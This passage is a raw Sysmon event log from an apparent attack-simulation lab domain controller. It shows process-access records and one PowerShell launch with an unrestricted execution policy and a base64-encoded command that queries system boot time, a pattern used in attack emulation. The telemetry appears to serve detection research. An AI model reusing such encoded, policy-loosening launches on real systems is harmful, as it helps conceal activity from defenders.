10:39:18.812{733EE690-3DD6-5F80-1003-000000007E01}43285048C:\Windows\system32\conhost.exe{733EE690-3DD6-5F80-1203-000000007E01}4812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000603Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.812{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000602Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.812{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000601Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.812{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000600Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.812{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000599Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.812{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000598Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.812{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000597Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.812{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000596Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.812{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000595Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.812{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000594Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.812{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000593Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.812{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000592Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.812{733EE690-3C5B-5F80-0500-000000007E01}6401216C:\Windows\system32\csrss.exe{733EE690-3DD6-5F80-1203-000000007E01}4812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000591Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.812{733EE690-3DD6-5F80-1103-000000007E01}50604420C:\Windows\system32\cmd.exe{733EE690-3DD6-5F80-1203-000000007E01}4812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000590Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.813{733EE690-3DD6-5F80-1203-000000007E01}4812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3DD6-5F80-41DA-110000000000}0x11da410HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{733EE690-3DD6-5F80-1103-000000007E01}5060C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x8000000000000000589Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.812{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000588Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.796{733EE690-3DD6-5F80-1003-000000007E01}43285048C:\Windows\system32\conhost.exe{733EE690-3DD6-5F80-1103-000000007E01}5060C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000587Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.796{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000586Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.796{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000585Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.796{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000584Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.796{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000583Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.796{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000582Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.796{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000581Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.796{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000580Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.796{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000579Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 